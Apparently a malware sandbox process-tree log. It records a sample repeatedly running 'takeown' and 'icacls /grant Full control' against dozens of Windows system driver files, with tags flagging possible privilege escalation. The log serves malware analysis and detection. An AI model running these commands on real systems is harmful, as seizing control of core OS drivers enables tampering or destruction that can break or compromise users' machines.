    C:\Windows\system32\icacls.exe (PID:3668): icacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3540): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3756): takeown /f C:\Windows\System32\drivers\cdfs.sys  [Modifies file permissions; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3824): icacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"
  C:\Windows\System32\cmd.exe (PID:3564): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3696): takeown /f C:\Windows\System32\drivers\cdrom.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3788): icacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"  [Possible privilege escalation attempt]

  C:\Windows\System32\cmd.exe (PID:3408): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3596): takeown /f C:\Windows\System32\drivers\circlass.sys
    C:\Windows\system32\icacls.exe (PID:3660): icacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"  [Possible privilege escalation attempt]

  C:\Windows\System32\cmd.exe (PID:3692): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3836): takeown /f C:\Windows\System32\drivers\Classpnp.sys  [Modifies file permissions; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3812): icacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3672): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3704): takeown /f C:\Windows\System32\drivers\CmBatt.sys
    C:\Windows\system32\icacls.exe (PID:3948): icacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3884): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3980): takeown /f C:\Windows\System32\drivers\cmdide.sys
    C:\Windows\system32\icacls.exe (PID:4036): icacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3816): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:4016): takeown /f C:\Windows\System32\drivers\cng.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3940): icacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3904): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:4020): takeown /f C:\Windows\System32\drivers\compbatt.sys
    C:\Windows\system32\icacls.exe (PID:3124): icacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3780): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3088): takeown /f C:\Windows\System32\drivers\CompositeBus.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:2560): icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3864): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:4072): takeown /f C:\Windows\System32\drivers\crashdmp.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:4048): icacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"  [Possible privilege escalation attempt]

  C:\Windows\System32\cmd.exe (PID:4088): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:592): takeown /f C:\Windows\System32\drivers\crcdisk.sys  [Possible privilege escalation attempt]
    C:\Windows\system32\icacls.exe (PID:772): icacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"
  C:\Windows\System32\cmd.exe (PID:3172): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3228): takeown /f C:\Windows\System32\drivers\csc.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:2272): icacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2720): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3328): takeown /f C:\Windows\System32\drivers\dfsc.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:112): icacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:4084): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3232): takeown /f C:\Windows\System32\drivers\discache.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3420): icacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"  [Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:3312): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3452): takeown /f C:\Windows\System32\drivers\disk.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3472): icacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3212): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3224): takeown /f C:\Windows\System32\drivers\Diskdump.sys  [Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3680): icacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2796): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3320): takeown /f C:\Windows\System32\drivers\dmvsc.sys
    C:\Windows\system32\icacls.exe (PID:3576): icacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"  [Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:3136): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3448): takeown /f C:\Windows\System32\drivers\drmk.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3708): icacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3432): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3696): takeown /f C:\Windows\System32\drivers\drmkaud.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3636): icacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3356): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3552): takeown /f C:\Windows\System32\drivers\Dumpata.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3836): icacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3200): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3764): takeown /f C:\Windows\System32\drivers\dumpfve.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:4076): icacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"  [Modifies file permissions]
  C:\Windows\System32\cmd.exe (PID:3740): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3944): takeown /f C:\Windows\System32\drivers\dxapi.sys  [Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3980): icacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3784): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3840): takeown /f C:\Windows\System32\drivers\dxg.sys  [Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3876): icacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3632): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3924): takeown /f C:\Windows\System32\drivers\dxgkrnl.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3112): icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3872): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3940): takeown /f C:\Windows\System32\drivers\dxgmms1.sys  [Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3124): icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3928): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:4056): takeown /f C:\Windows\System32\drivers\elxstor.sys  [Possible privilege escalation attempt]
    C:\Windows\system32\icacls.exe (PID:4000): icacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3968): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:2528): takeown /f C:\Windows\System32\drivers\errdev.sys
    C:\Windows\system32\icacls.exe (PID:3480): icacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:4008): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3276): takeown /f C:\Windows\System32\drivers\evbda.sys
    C:\Windows\system32\icacls.exe (PID:1444): icacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"  [Possible privilege escalation attempt]

  C:\Windows\System32\cmd.exe (PID:2116): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3328): takeown /f C:\Windows\System32\drivers\exfat.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3188): icacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"  [Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:936): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3428): takeown /f C:\Windows\System32\drivers\fastfat.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:2412): icacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"
  C:\Windows\System32\cmd.exe (PID:3228): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3576): takeown /f C:\Windows\System32\drivers\fdc.sys
    C:\Windows\system32\icacls.exe (PID:3676): icacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3320): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3420): takeown /f C:\Windows\System32\drivers\fileinfo.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3588): icacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3128): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3572): takeown /f C:\Windows\System32\drivers\filetrace.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3892): icacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2288): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3832): takeown /f C:\Windows\System32\drivers\flpydisk.sys
    C:\Windows\system32\icacls.exe (PID:3988): icacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3140): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3768): takeown /f C:\Windows\System32\drivers\fltMgr.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3756): icacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"  [Possible privilege escalation attempt; Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:392): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3828): takeown /f C:\Windows\System32\drivers\fsdepends.sys  [Modifies file permissions; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3276): icacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3636): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3924): takeown /f C:\Windows\System32\drivers\fs_rec.sys  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:2484): icacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3664): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3628): takeown /f C:\Windows\System32\drivers\fvevol.sys  [Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:2140): icacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3836): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3700): takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS  [Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3624): icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"
  C:\Windows\System32\cmd.exe (PID:3548): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3568): takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS
    C:\Windows\system32\icacls.exe (PID:3852): icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3896): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:112): takeown /f C:\Windows\System32\drivers\gm.dls  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:3352): icacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3516): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3476): takeown /f C:\Windows\System32\drivers\gmreadme.txt  [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\system32\icacls.exe (PID:4040): icacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"  [Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:3844): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3232): takeown /f C:\Windows\System32\drivers\hcw85cir.sys  [Modifies file permissions]
    C:\Windows\system32\icacls.exe (PID:2588): icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3396): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3424): takeown /f C:\Windows\System32\drivers\hdaudbus.sys
    C:\Windows\system32\icacls.exe (PID:3996): icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:4024): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3572): takeown /f C:\Windows\System32\drivers\HdAudio.sys
    C:\Windows\system32\icacls.exe (PID:4012): icacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3224): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3944): takeown /f C:\Windows\System32\drivers\hidbatt.sys
    C:\Windows\system32\icacls.exe (PID:3452): icacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3676): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3332): takeown /f C:\Windows\System32\drivers\hidbth.sys
    C:\Windows\system32\icacls.exe (PID:3980): icacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3220): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3756): takeown /f C:\Windows\System32\drivers\hidclass.sys
    C:\Windows\system32\icacls.exe (PID:3528): icacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3280): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3712): takeown /f C:\Windows\System32\drivers\hidir.sys
    C:\Windows\system32\icacls.exe (PID:3296): icacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3616): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3688): takeown /f C:\Windows\System32\drivers\hidparse.sys  [Modifies file permissions]
    C:\Windows\system32\icacls.exe (PID:3416): icacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"
  C:\Windows\System32\cmd.exe (PID:3736): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3596): takeown /f C:\Windows\System32\drivers\hidusb.sys
    C:\Windows\system32\icacls.exe (PID:2484): icacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"  [Possible privilege escalation attempt; Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:3600): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3380): takeown /f C:\Windows\System32\drivers\HpSAMD.sys
    C:\Windows\system32\icacls.exe (PID:4072): icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3084): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3100): takeown /f C:\Windows\System32\drivers\http.sys  [Possible privilege escalation attempt]
    C:\Windows\system32\icacls.exe (PID:3436): icacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3504): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3944): takeown /f C:\Windows\System32\drivers\hwpolicy.sys
    C:\Windows\system32\icacls.exe (PID:3096): icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3480): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3768): takeown /f C:\Windows\System32\drivers\i8042prt.sys
    C:\Windows\system32\icacls.exe (PID:4012): icacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3620): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3428): takeown /f C:\Windows\System32\drivers\iaStorV.sys
    C:\Windows\system32\icacls.exe (PID:3988): icacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:2316): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3728): takeown /f C:\Windows\System32\drivers\iirsp.sys
    C:\Windows\system32\icacls.exe (PID:3576): icacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3812): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3448): takeown /f C:\Windows\System32\drivers\intelide.sys
    C:\Windows\system32\icacls.exe (PID:2528): icacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"  [Modifies file permissions]

  C:\Windows\System32\cmd.exe (PID:3572): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3756): takeown /f C:\Windows\System32\drivers\intelppm.sys
    C:\Windows\system32\icacls.exe (PID:3588): icacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3748): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3688): takeown /f C:\Windows\System32\drivers\ipfltdrv.sys
    C:\Windows\system32\icacls.exe (PID:3604): icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3120): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3924): takeown /f C:\Windows\System32\drivers\IPMIDrv.sys  [Possible privilege escalation attempt]
    C:\Windows\system32\icacls.exe (PID:3832): icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:3680): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3596): takeown /f C:\Windows\System32\drivers\ipnat.sys  [Possible privilege escalation attempt]
    C:\Windows\system32\icacls.exe (PID:3508): icacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"

  C:\Windows\System32\cmd.exe (PID:564): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID:3768): takeown /f C:\Windows\System32\drivers\irda.sys
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"3⤵PID:4012
-
-
-
